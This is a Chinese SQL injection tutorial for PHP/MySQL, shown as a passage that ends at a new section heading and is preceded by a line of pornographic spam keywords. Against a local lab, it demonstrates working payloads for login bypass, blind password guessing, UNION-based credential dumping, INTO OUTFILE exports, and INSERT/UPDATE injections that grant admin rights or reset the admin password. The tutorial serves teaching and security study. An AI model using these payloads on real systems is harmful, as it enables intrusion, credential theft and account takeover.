国产无遮挡裸体免费直播视频,久久精品国产蜜臀av,动漫在线视频一区二区,欧亚日韩一区二区三区,久艹在线 免费视频,国产精品美女网站免费,正在播放 97超级视频在线观看,斗破苍穹年番在线观看免费,51最新乱码中文字幕

php SQL Injection with MySQL

 更新時(shí)間:2011年02月27日 01:45:52   作者:  
本文僅用于教學(xué)目的,如果因?yàn)楸疚脑斐傻墓艉蠊救烁挪回?fù)責(zé),本文所有代碼均為本人所寫,所有數(shù)據(jù)均經(jīng)過測(cè)試。絕對(duì)真實(shí)。

前言

  2003年開始,喜歡腳本攻擊的人越來越多,而且研究ASP下注入的朋友也逐漸多了起來,我看過最早的關(guān)于SQL注入的文章是一篇99年國(guó)外的高手寫的,而現(xiàn)在國(guó)外的已經(jīng)爐火純青了,國(guó)內(nèi)才開始注意這個(gè)技術(shù),由此看來,國(guó)內(nèi)的這方面的技術(shù)相對(duì)于國(guó)外還是有一段很大差距,話說回來,大家對(duì)SQL注入攻擊也相當(dāng)熟悉了,國(guó)內(nèi)各大站點(diǎn)都有些堪稱經(jīng)典的作品,不過作為一篇完整的文章,我覺得還是有必要再說說其定義和原理。如果哪位高手已經(jīng)達(dá)到爐火純青的地步,不妨給本文挑點(diǎn)刺。權(quán)當(dāng)指點(diǎn)小弟。

關(guān)于php+Mysql的注入

  國(guó)內(nèi)能看到php+Mysql注入的文章可能比較少,但是如果關(guān)注各種WEB程序的漏洞,就可以發(fā)現(xiàn),其實(shí)這些漏洞的文章其實(shí)就是一個(gè)例子。不過由于國(guó)內(nèi)研究PHP的人比研究ASP的人實(shí)在少太多,所以,可能沒有注意,況且PHP的安全性比ASP高很多,導(dǎo)致很多人不想跨越這個(gè)門檻。
  盡管如此,在PHP站點(diǎn)日益增多的今天,SQL注入仍是最有效最麻煩的一種攻擊方式,有效是因?yàn)橹辽?0% 以上的站點(diǎn)存在SQL Injection漏洞,包括國(guó)內(nèi)大部分安全站點(diǎn),麻煩是因?yàn)镸YSQL4以下的版本是不支持子語句的,而且當(dāng)php.ini里的 magic_quotes_gpc 為On 時(shí)。提交的變量中所有的 ' (單引號(hào)), " (雙引號(hào)), \ (反斜線) and 空字符會(huì)自動(dòng)轉(zhuǎn)為含有反斜線的轉(zhuǎn)義字符。給注入帶來不少的阻礙。
  早期的時(shí)候,根據(jù)程序的代碼,要構(gòu)造出沒有引號(hào)的語句形成有效的攻擊,還真的有點(diǎn)困難,好在現(xiàn)在的技術(shù)已經(jīng)構(gòu)造出不帶引號(hào)的語句應(yīng)用在某些場(chǎng)合。只要有經(jīng)驗(yàn),其實(shí)構(gòu)造有效的語句一點(diǎn)也不難,甚至成功率也很高,但具體情況具體分析。首先要走出一個(gè)誤區(qū)。

注:在沒有具體說明的情況下,我們假設(shè)magic_quotes_gpc均為off。

php+Mysql注入的誤區(qū)

  很多人認(rèn)為在PHP+MYSQL下注入一定要用到單引號(hào),或者是沒有辦法像MSSQL那樣可以使用“declare @a sysname select @a=<command> exec master.dbo.xp_cmdshell @a”這類的命令來消除引號(hào),其實(shí)這個(gè)是大家對(duì)注入的一種誤解或這說是對(duì)注入認(rèn)識(shí)上的一種誤區(qū)。
  為什么呢?因?yàn)椴还茉谑裁凑Z言里,在引號(hào)(包括單雙)里,所有字符串均是常量,即使是dir這樣的命令,也緊緊是字符串而已,并不能當(dāng)做命令執(zhí)行,除非是這樣寫的代碼:

$command = "dir c:\";
system($command);

  否則僅僅只是字符串,當(dāng)然,我們所說的命令不單指系統(tǒng)命令,我們這里說的是SQL語句,要讓我們構(gòu)造的SQL語句正常執(zhí)行,就不能讓我們的語句變成字符串,那么什么情況下會(huì)用單引號(hào)?什么時(shí)候不用呢?看看下面兩句SQL語句:

①SELECT * FROM article WHERE articleid='$id'
②SELECT * FROM article WHERE articleid=$id

  兩種寫法在各種程序中都很普遍,但安全性是不同的,第一句由于把變量$id放在一對(duì)單引號(hào)中,這樣使得我們所提交的變量都變成了字符串,即使包含了正確的SQL語句,也不會(huì)正常執(zhí)行,而第二句不同,由于沒有把變量放進(jìn)單引號(hào)中,那我們所提交的一切,只要包含空格,那空格后的變量都會(huì)作為SQL語句執(zhí)行,我們針對(duì)兩個(gè)句子分別提交兩個(gè)成功注入的畸形語句,來看看不同之處。

① 指定變量$id為:
1' and 1=2 union select * from user where userid=1/*
此時(shí)整個(gè)SQL語句變?yōu)椋?BR>SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*'

②指定變量$id為:
1 and 1=2 union select * from user where userid=1
此時(shí)整個(gè)SQL語句變?yōu)椋?BR>SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1

  看出來了嗎?由于第一句有單引號(hào),我們必須先閉合前面的單引號(hào),這樣才能使后面的語句作為SQL執(zhí)行,并要注釋掉后面原SQL語句中的后面的單引號(hào),這樣才可以成功注入,如果php.ini中magic_quotes_gpc設(shè)置為on或者變量前使用了addslashes()函數(shù),我們的攻擊就會(huì)化為烏有,但第二句沒有用引號(hào)包含變量,那我們也不用考慮去閉合、注釋,直接提交就OK了。
  大家看到一些文章給出的語句中沒有包含單引號(hào)例如pinkeyes的《php注入實(shí)例》中給出的那句SQL語句,是沒有包含引號(hào)的,大家不要認(rèn)為真的可以不用引號(hào)注入,仔細(xì)看看PHPBB的代碼,就可以發(fā)現(xiàn),那個(gè)$forum_id所在的SQL語句是這樣寫的:

$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";

  由于沒有用單引號(hào)包含變量,才給pinkeyes這個(gè)家伙有機(jī)可乘,所以大家在寫PHP程序的時(shí)候,記得用單引號(hào)把變量包含起來。當(dāng)然,必要的安全措施是必不可少的。

簡(jiǎn)單的例子

  先舉一個(gè)例子來給大家了解一下PHP下的注入的特殊性和原理。當(dāng)然,這個(gè)例子也可以告訴大家如何學(xué)習(xí)構(gòu)造有效的SQL語句。
  我們拿一個(gè)用戶驗(yàn)證的例子,首先建立一個(gè)數(shù)據(jù)庫(kù)和一個(gè)數(shù)據(jù)表并插入一條記錄,如下:

CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

#
# 導(dǎo)出表中的數(shù)據(jù) `user`
#

INSERT INTO `user` VALUES (1, 'angel', 'mypass');

  驗(yàn)證用戶文件的代碼如下:

<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

$sql = "SELECT * FROM user WHERE username='$username' AND password='$password'";

$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);

if (empty($userinfo))
{
echo "登陸失敗";
} else {
echo "登陸成功";
}

echo "<p>SQL Query:$sql<p>";
?>

  這時(shí)我們提交:

http://127.0.0.1/injection/user.php?username=angel' or 1=1

  就會(huì)返回:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13
登陸失敗

SQL Query:SELECT * FROM user WHERE username='angel' or 1=1' AND password=''

PHP Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in F:\www\injection\user.php on line 13

  看到了嗎?單引號(hào)閉合后,并沒有注釋掉后面的單引號(hào),導(dǎo)致單引號(hào)沒有正確配對(duì),所以由此可知我們構(gòu)造的語句不能讓Mysql正確執(zhí)行,要重新構(gòu)造:

http://127.0.0.1/injection/user.php?username=angel' or '1=1

  這時(shí)顯示“登陸成功”,說明成功了?;蛘咛峤唬?/P>

http://127.0.0.1/injection/user.php?username=angel'/*
http://127.0.0.1/injection/user.php?username=angel'%23

  這樣就把后面的語句給注釋掉了!說說這兩種提交的不同之處,我們提交的第一句是利用邏輯運(yùn)算,在ASP中運(yùn)用可以說是非常廣泛的,這個(gè)不用說了吧?第二、三句是根據(jù)mysql的特性,mysql支持/*和#兩種注釋格式,所以我們提交的時(shí)候是把后面的代碼注釋掉,值得注意的是由于編碼問題,在IE地址欄里提交#會(huì)變成空的,所以我們?cè)诘刂窓谔峤坏臅r(shí)候,應(yīng)該提交%23,才會(huì)變成#,就成功注釋了,這個(gè)比邏輯運(yùn)算簡(jiǎn)單得多了,由此可以看出PHP比ASP強(qiáng)大靈活多了。
  通過上面的例子大家應(yīng)該對(duì)PHP+MYSQL的注入有個(gè)感性的認(rèn)識(shí)了吧?

語句構(gòu)造

  PHP+MYSQL注入的博大精深不僅僅體現(xiàn)在認(rèn)證體系的饒過,語句的構(gòu)造才是最有趣味的地方,但構(gòu)造語句和ACCESS、MSSQL都有少許不同,但同樣可以發(fā)揮得淋漓盡致??聪旅娴睦?。

一、搜索引擎

  網(wǎng)上有一大堆的PHP程序搜索引擎是有問題的,也就是提交特殊字符可以顯示所有記錄,包括不符合條件的,其實(shí)這個(gè)危害也不算大,因?yàn)樵试S用戶輸入關(guān)鍵字進(jìn)行模糊查詢的地方大多數(shù)都允許檢索所有的記錄。很多查詢的設(shè)計(jì)就是這樣的。
  查詢是只讀的操作應(yīng)該不會(huì)對(duì)數(shù)據(jù)產(chǎn)生破壞作用,不要太擔(dān)心。不過泄露隱私不知道算不算危害,下面是一個(gè)標(biāo)準(zhǔn)的搜索引擎:

<form method="GET" action="search.php" name="search">
<input name="keywords" type="text" value="" size="15"> <input type="submit" value="Search">
</form>
<p><b>Search result</b></p>

<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

$keywords = $_GET['keywords'];
if (!empty($keywords)) {
  //$keywords = addslashes($keywords);
  //$keywords = str_replace("_","\_",$keywords);
  //$keywords = str_replace("%","\%",$keywords);

  $sql = "SELECT * FROM ".$db_prefix."article WHERE title LIKE '%$keywords%' $search ORDER BY title DESC";
  $result = mysql_db_query($dbname,$sql);
  $tatol=mysql_num_rows($result);

  echo "<p>SQL Query:$sql<p>";

  if ($tatol <=0){
    echo "The \"<b>$keywords</b>\" was not found in all the record.<p>\n";
  } else {
    while ($article=mysql_fetch_array($result)) {
      echo "<li>".htmlspecialchars($article[title])."<p>\n";
    } //while
  }
} else {
  echo "<b>Please enter some keywords.</b><p>\n";
}
?>

  一般程序都是這樣寫的,如果缺乏變量檢查,我們就可以改寫變量,達(dá)到“注入”的目的,盡管沒有危害,當(dāng)我們輸入“___” 、“.__ ”、“%”等類似的關(guān)鍵字時(shí),會(huì)把數(shù)據(jù)庫(kù)中的所有記錄都取出來。如果我們?cè)诒韱翁峤唬?/P>

%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#

  SQL語句就被改變成下面的樣子了,

SELECT * FROM article WHERE title LIKE '%%' ORDER BY articleid/*%' ORDER BY title DESC
SELECT * FROM article WHERE title LIKE '%__' ORDER BY articleid#%' ORDER BY title DESC

  就會(huì)列出所有記錄,包括被隱藏的,還可以改變排列順序。這個(gè)雖然危害不大,也算是注入的一種方式了吧?

二、查詢字段

  查詢字段又可以分成兩種,本表查詢和跨表查詢,這兩種查詢和ACCESS、MSSQL差不多,甚至更強(qiáng)大、更靈活、更方便。不知道為什么就是有人認(rèn)為比ASP難?我們?cè)贏SP中經(jīng)常使用的個(gè)別函數(shù)在PHP里要有小小的改動(dòng),如下:

① 本表查詢

  看下面一條SQL語句,多用在論壇或者會(huì)員注冊(cè)系統(tǒng)查看用戶資料的,

<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

$sql = "SELECT * FROM user WHERE username='$username'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);

if (!$row) {
  echo "該記錄不存在";
  echo "<p>SQL Query:$sql<p>";
  exit;
}

echo "你要查詢的用戶ID是:$row[userid]\n";
echo "<p>SQL Query:$sql<p>";
?>

  當(dāng)我們提交的用戶名為真時(shí),就會(huì)正常返回用戶的ID,如果為非法參數(shù)就會(huì)提示相應(yīng)的錯(cuò)誤,由于是查詢用戶資料,我們可以大膽猜測(cè)密碼就存在這個(gè)數(shù)據(jù)表里(現(xiàn)在我還沒有碰見過密碼是單獨(dú)存在另一個(gè)表的程序),記得剛才的身份驗(yàn)證程序嗎?和現(xiàn)在的相比,就少了一個(gè)AND條件,如下:

SELECT * FROM user WHERE username='$username' AND password='$password'SELECT * FROM user WHERE username='$username'

  相同的就是當(dāng)條件為真時(shí),就會(huì)給出正確的提示信息,如果我們構(gòu)造出后面的AND條件部分,并使這部分為真,那我們的目的也就達(dá)到了,還是利用剛才建立的user數(shù)據(jù)庫(kù),用戶名為angel,密碼為mypass,
看了上面的例子,應(yīng)該知道構(gòu)造了吧,如果我們提交:

http://127.0.0.1/injection/user.php?username=angel' and password='mypass

  這個(gè)是絕對(duì)為真的,因?yàn)槲覀冞@樣提交上面的SQL語句變成了下面的樣子:

SELECT * FROM user WHERE username='angel' AND password='mypass'

  但在實(shí)際的攻擊中,我們是肯定不知道密碼的,假設(shè)我們知道數(shù)據(jù)庫(kù)的各個(gè)字段,下面我們就開始探測(cè)密碼了,首先獲取密碼長(zhǎng)度:

http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6

  在ACCESS中,用LEN()函數(shù)來獲取字符串長(zhǎng)度,在MYSQL中,要使用LENGTH(),只要沒有構(gòu)造錯(cuò)誤,也就是說SQL語句能正常執(zhí)行,那返回結(jié)果無外乎兩種,不是返回用戶ID,就是返回“該記錄不存在”。當(dāng)用戶名為angel并且密碼長(zhǎng)度為6的時(shí)候返回真,就會(huì)返回相關(guān)記錄,是不是和ASP里一樣?再用LEFT()、RIGHT()、MID()函數(shù)猜密碼:

http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,2)='my
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,3)='myp
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,4)='mypa
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,5)='mypas
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,6)='mypass

  看,密碼不是出來了嗎?簡(jiǎn)單吧?當(dāng)然實(shí)際情況會(huì)有不少條件限制,下面還會(huì)講到這個(gè)例子的深入應(yīng)用。

② 跨表查詢

  這部分就和ASP有點(diǎn)出入了,除了一定要用UNION連接兩條SQL語句,最難掌握的就是字段的數(shù)量,如果看過MYSQL參考手冊(cè),就知道了在 SELECT 中的 select_expression (select_expression 表示你希望檢索的列[字段]) 部分列出的列必須具有同樣的類型。第一個(gè) SELECT 查詢中使用的列名將作為結(jié)果集的列名返回。簡(jiǎn)單的說,也就是UNION后面查選的字段數(shù)量、字段類型都應(yīng)該與前面的SELECT一樣,而且,如果前面的SELECT為真,就同時(shí)返回兩個(gè)SELECT的結(jié)果,當(dāng)前面的SELECT為假,就會(huì)返回第二個(gè)SELECT所得的結(jié)果,某些情況會(huì)替換掉在第一個(gè)SELECT原來應(yīng)該顯示的字段,如下圖:

  看了這個(gè)圖直觀多了吧?所以應(yīng)該先知道前面查詢表的數(shù)據(jù)表的結(jié)構(gòu)。如果我們查詢兩個(gè)數(shù)據(jù)表的字段相同,類型也相同,我們就可以這樣提交:

SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM……

  如果字段數(shù)量、字段類型任意一個(gè)不相同,就只能搞清除數(shù)據(jù)類型和字段數(shù)量,這樣提交:

SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM……

  否則就會(huì)報(bào)錯(cuò):

The used SELECT statements have a different number of columns

  如果不知道數(shù)據(jù)類型和字段數(shù)量,可以用1來慢慢試,因?yàn)?屬于int\str\var類型,所以我們只要慢慢改變數(shù)量,一定可以猜到的。如果不能馬上理解上面的理論,后面有很詳細(xì)的例子。
  我們看看下面的數(shù)據(jù)結(jié)構(gòu),是一個(gè)簡(jiǎn)單的文章數(shù)據(jù)表。

CREATE TABLE `article` (
`articleid` int(11) NOT NULL auto_increment,
`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
PRIMARY KEY (`articleid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

#
# 導(dǎo)出表中的數(shù)據(jù) `article`
#

INSERT INTO `article` VALUES (1, '我是一個(gè)不愛讀書的孩子', '中國(guó)的教育制度真是他媽的落后!如果我當(dāng)教育部長(zhǎng)。我要把所有老師都解雇!');
INSERT INTO `article` VALUES (2, '我恨死你', '我恨死你了,你是什么東西啊');

  這個(gè)表的字段類型分別是int、varchar、text,如果我們用UNION聯(lián)合查詢的時(shí)候,后面的查詢的表的結(jié)構(gòu)和這個(gè)一樣。就可以用“SELECT *”,如果有任何一個(gè)不一樣,那我們只能用“SELECT 1,1,1,1……”了。

  下面的文件是一個(gè)很標(biāo)準(zhǔn)、簡(jiǎn)單的顯示文章的文件,很多站點(diǎn)都是這種頁面沒有過濾,所以成為最明顯的注入點(diǎn),下面就拿這個(gè)文件作為例子,開始我們的注入實(shí)驗(yàn)。

<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");

$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);

if (!$row)
{
  echo "該記錄不存在";
  echo "<p>SQL Query:$sql<p>";
  exit;
}

echo "title<br>".$row[title]."<p>\n";
echo "content<br>".$row[content]."<p>\n";
echo "<p>SQL Query:$sql<p>";
?>

正常情況下,我們提交這樣的一個(gè)請(qǐng)求:

http://127.0.0.1/injection/show.php?id=1

  就會(huì)顯示articleid為1的文章,但我們不需要文章,我們需要的是用戶的敏感信息,就要查詢user表,現(xiàn)在是查詢剛才我們建立的user表。
  由于$id沒有過濾給我們制造了這個(gè)機(jī)會(huì),我們要把show.php文件中的SQL語句改寫成類似這個(gè)樣子:

SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM user ……

  由于這個(gè)代碼是有單引號(hào)包含著變量的,我們現(xiàn)在提交:

http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*

  按道理說,應(yīng)該顯示用戶表的username、password兩個(gè)字段的內(nèi)容才對(duì)啊,怎么正常顯示文章呢?如圖:

  其實(shí),我們提交的articleid=1是article表里存在的,執(zhí)行結(jié)果就是真了,自然返回前面SELECT的結(jié)果,當(dāng)我們提交空的值或者提交一個(gè)不存在的值,就會(huì)蹦出我們想要的東西:

http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=99999' union select 1,username,password from user/*

  如圖:

  現(xiàn)在就在字段相對(duì)應(yīng)的地方顯示出我們所要的內(nèi)容。如果還不清楚思路以及具體的應(yīng)用,后面還會(huì)講到一些高級(jí)的技巧。

三、導(dǎo)出文件

  這個(gè)是比較容易構(gòu)造但又有一定限制的技術(shù),我們經(jīng)??梢钥匆娨韵碌腟QL語句:

select * from table into outfile 'c:/file.txt'
select * from table into outfile '/var/www/file.txt'

  但這樣的語句,一般很少用在程序里,有誰會(huì)把自己的數(shù)據(jù)導(dǎo)出呢?除非是備份,但我也沒有見過這種備份法。所以我們要自己構(gòu)造,但必須有下面的前提條件:

  • 必須導(dǎo)出到能訪問的目錄,這樣才能下載。
  • 能訪問的目錄必須要有可寫的權(quán)限,否則導(dǎo)出會(huì)失敗。
  • 確保硬盤有足夠的容量能容下導(dǎo)出的數(shù)據(jù),這個(gè)很少見。
  • 確保要已經(jīng)存在相同的文件名,會(huì)導(dǎo)致導(dǎo)出失敗,并提示:“File 'c:/file.txt' already exists”,這樣可以防止數(shù)據(jù)庫(kù)表和文件例如/etc/passwd被破壞。

  我們繼續(xù)用上面的user.php和show.php兩個(gè)文件舉例,如果一個(gè)一個(gè)用戶猜解實(shí)在是太慢了,如果對(duì)方的密碼或者其他敏感信息很復(fù)雜,又不會(huì)寫Exploit,要猜到什么時(shí)候?。縼睃c(diǎn)大范圍的,直接導(dǎo)出全部數(shù)據(jù)好了。user.php文件的查詢語句,我們按照into outfile的標(biāo)準(zhǔn)格式,注入成下面的語句就能導(dǎo)出我們需要的信息了:

SELECT * FROM user WHERE username='$username' into outfile 'c:/file.txt'

  知道怎么樣的語句可以實(shí)現(xiàn)我們的目的,我們就很容易構(gòu)造出相應(yīng)的語句:

http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt

  出現(xiàn)了錯(cuò)誤提示,但從返回的語句看來,我們的SQL語句確實(shí)是注入正確了,即使出現(xiàn)錯(cuò)誤,也是查詢的問題了,文件還是乖乖的被導(dǎo)出了,如圖:

  由于代碼本身就有WHERE來指定一個(gè)條件,所以我們導(dǎo)出的數(shù)據(jù)僅僅是滿足這個(gè)條件的數(shù)據(jù),如果我們想導(dǎo)出全部呢?其實(shí)很簡(jiǎn)單,只要使這個(gè)WHERE條件為假,并且指定一個(gè)成真的條件,就可以不用被束縛在WHERE里了,來看看經(jīng)典1=1發(fā)揮作用了:

http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt

  實(shí)際的SQL語句變?yōu)椋?/P>

SELECT * FROM user WHERE username='' or 1=1 into outfile 'c:/file.txt'

  這樣username的參數(shù)是空的,就是假了,1=1永遠(yuǎn)是真的,那or前面的WHERE就不起作用了,但千萬別用and哦,否則是不能導(dǎo)出全部數(shù)據(jù)的。
  既然條件滿足,在這種情況下就直接導(dǎo)出所有數(shù)據(jù)!如圖:

  但是跨表的導(dǎo)出文件的語句該怎么構(gòu)造呢?還是用到UNION聯(lián)合查詢,所以一切前提條件都應(yīng)該和UNION、導(dǎo)出數(shù)據(jù)一樣,跨表導(dǎo)出數(shù)據(jù)正常情況下應(yīng)該相下面的一樣:

SELECT * FROM article WHERE articleid='1' union select 1,username,password from user into outfile 'c:/user.txt'

  這樣可以導(dǎo)出文件了,如果我們要構(gòu)造就提交:

http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user into outfile 'c:/user.txt

  文件是出來了,可是有一個(gè)問題,由于前面的查詢articleid='1'為真了,所以導(dǎo)出的數(shù)據(jù)也有整個(gè)文章的一部分,如圖:

  所以我們把應(yīng)該使前面的查詢語句為假,才能只導(dǎo)出后面查詢的內(nèi)容,只要提交:

http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

  這樣才能得到我們想要的資料:

  值得注意的是想要導(dǎo)出文件,必須magic_quotes_gpc沒有打開,并且程序也沒有用到addslashes()函數(shù),還有不能對(duì)單引號(hào)做任何過濾,因?yàn)槲覀冊(cè)谔峤粚?dǎo)出路徑的時(shí)候,一定要用引號(hào)包含起來,否則,系統(tǒng)不會(huì)認(rèn)識(shí)那是一個(gè)路徑,也不用嘗試用char()或者什么函數(shù),那是徒勞。

INSERT

  如果大家認(rèn)為MYSQL中注入僅僅適用于SELECT就大錯(cuò)特錯(cuò)了,其實(shí)還有兩個(gè)危害更大的操作,那就是INSERT和UPDATE語句,這類例子不多,先面先說說INSERT,這主要應(yīng)用于改寫插入的數(shù)據(jù),我們來看個(gè)簡(jiǎn)單而又廣泛存在的例子,看看下面的數(shù)據(jù)結(jié)構(gòu):

CREATE TABLE `user` (
`userid` INT NOT NULL AUTO_INCREMENT ,
`username` VARCHAR( 20 ) NOT NULL ,
`password` VARCHAR( 50 ) NOT NULL ,
`homepage` VARCHAR( 255 ) NOT NULL ,
`userlevel` INT DEFAULT '1' NOT NULL ,
PRIMARY KEY ( `userid` )
);

  其中的userlevel代表用戶的等級(jí),1是普通用戶,2是普通管理員,3是超級(jí)管理員,一個(gè)注冊(cè)程序默認(rèn)是注冊(cè)成普通用戶,如下:

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

  默認(rèn)userlevel字段是插入1,其中的變量都是沒有經(jīng)過過濾就直接寫入數(shù)據(jù)庫(kù)的,不知道大家有什么想法?對(duì),就是直接注入,使我們一注冊(cè)就是超級(jí)管理員。我們注冊(cè)的時(shí)候,構(gòu)造$homepage變量,就可以達(dá)到改寫的目的,指定$homepage變量為:

http://4ngel.net', '3')#

  插入數(shù)據(jù)庫(kù)的時(shí)候就變成:

INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

  這樣就注冊(cè)成為超級(jí)管理員了。但這種利用方法也有一定的局限性,比如,我沒有需要改寫的變量如userlevel字段是數(shù)據(jù)庫(kù)的第一個(gè)字段,前面沒有地方給我們注入,我們也沒有辦法了。
或許INSERT還有更廣泛的應(yīng)用,大家可以自行研究,但原理都是一樣的。

UPDATE

  和INSERT相比,UPDATE的應(yīng)用更加廣泛,如果過濾不夠,足以改寫任何數(shù)據(jù),還是拿剛才的注冊(cè)程序來說,數(shù)據(jù)結(jié)構(gòu)也不變,我們看一下用戶自己修改自己的資料,SQL語句一般都是這樣寫的:

UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id'

  用戶可以修改自己的密碼和主頁,大家有什么想法?總不至于還是提升權(quán)限吧?程序中的SQL語句又沒有更新userlevel字段,怎么提升?。窟€是老辦法,構(gòu)造$homepage變量, 指定$homepage變量為:

http://4ngel.net', userlevel='3

  整個(gè)SQL語句就變成這樣:

UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'

  我們是不是又變成超級(jí)管理員了?程序不更新userlevel字段,我們自己來。
還有更加絕的,直接修改任意用戶的資料,還是剛才的例句,但這次安全一點(diǎn),使用MD5加密:

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'

  盡管密碼被加密了,但我們還是可以構(gòu)造我們需要的語句,我們指定$password為:

mypass)' WHERE username='admin'#

  這時(shí)整個(gè)語句變?yōu)椋?/P>

UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'

  這樣就更改了更新的條件,我管你后面的代碼是不是在哭這說:我們還沒有執(zhí)行啊。當(dāng)然,也可以從$id下手,指定$id為:

' OR username='admin'

  這時(shí)整個(gè)語句變?yōu)椋?/P>

UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='' OR username='admin'

  照樣也可以達(dá)到修改的目的,所以說注入是非常靈活的技術(shù)。如果有些變量是從數(shù)據(jù)庫(kù)讀取的固定值,甚至用$_SESSION['username']來讀取服務(wù)器上的SESSION信息時(shí),我們就可以在原來的WHERE之前自己構(gòu)造WHERE并注釋掉后面的代碼,由此可見,靈活運(yùn)用注釋也是注入的技巧之一。這些技巧把注入發(fā)揮得淋漓盡致。不得不說是一種藝術(shù)。
  變量的提交方式可以是GET或POST,提交的位置可以是地址欄、表單、隱藏表單變量或修改本地COOKIE信息等,提交的方式可以是本地提交,服務(wù)器上提交或者是工具提交,多種多樣就看你如何運(yùn)用了。

高級(jí)應(yīng)用

1、 使用MYSQL內(nèi)置函數(shù)

  我們?cè)贏CCESS、MSSQL中的注入,有很多比較高級(jí)的注入方法,比如深入到系統(tǒng),猜中文等,這些東西,在MYSQL也能很好得到發(fā)揮,其實(shí)在MYSQL有很多內(nèi)置函數(shù)都可以用在SQL語句里,這樣就可以使我們能在注入時(shí)更靈活,得到更多關(guān)于系統(tǒng)的信息。有幾個(gè)函數(shù)是比較常用的:

DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
……

  各個(gè)函數(shù)的具體作用大家可以查閱MYSQL手冊(cè),比如下面這句UPDATE:

UPDATE article SET title=$title WHERE articleid=1

  我們可以指定$title為以上的各個(gè)函數(shù),因?yàn)闆]有被引號(hào)包含,所以函數(shù)是能正確執(zhí)行的:

UPDATE article SET title=DATABASE() WHERE id=1
#把當(dāng)前數(shù)據(jù)庫(kù)名更新到title字段
UPDATE article SET title=USER() WHERE id=1
#把當(dāng)前 MySQL 用戶名更新到title字段
UPDATE article SET title=SYSTEM_USER() WHERE id=1
#把當(dāng)前 MySQL 用戶名更新到title字段
UPDATE article SET title=SESSION_USER() WHERE id=1
#把當(dāng)前 MySQL 用戶名更新到title字段
UPDATE article SET title=CURRENT_USER() WHERE id=1
#把當(dāng)前會(huì)話被驗(yàn)證匹配的用戶名更新到title字段

  靈活運(yùn)用MYSQL內(nèi)置的函數(shù),可以獲得不少有用的信息,比如數(shù)據(jù)庫(kù)版本、名字、用戶、當(dāng)前數(shù)據(jù)庫(kù)等,比如前面跨表查詢的例子,提交:

http://127.0.0.1/injection/show.php?id=1

  可以看到一篇文章,我們?cè)趺礃硬拍苤繫YSQL數(shù)據(jù)庫(kù)的相關(guān)信息呢?同樣也是用MYSQL內(nèi)置函數(shù)配合UNION聯(lián)合查詢,不過相比之下就簡(jiǎn)單得多了,甚至還可以讀取文件!既然要用到UNION,同樣要滿足UNION的條件——字段數(shù)、數(shù)據(jù)類型相同。如果我們知道了數(shù)據(jù)結(jié)構(gòu),直接構(gòu)造:

http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()

  就可以返回當(dāng)前數(shù)據(jù)庫(kù)名和數(shù)據(jù)庫(kù)版本,構(gòu)造是比較容易的。
  下面附上一段由我好友Super·Hei寫的代碼,可以把字符串轉(zhuǎn)換為ASCII代碼。感謝提供。

#!/usr/bin/perl
#cody by Super·Hei
#to angel
#C:\>test.pl c:\boot.ini
#99,58,92,98,111,111,116,46,105,110,105

$ARGC = @ARGV;
if ($ARGC != 1) {
  print "Usage: $0 \n";
  exit(1);
}

$path=shift;

@char = unpack('C*', $path);

$asc=join(",",@char);

print $asc;

2、不加單引號(hào)注入

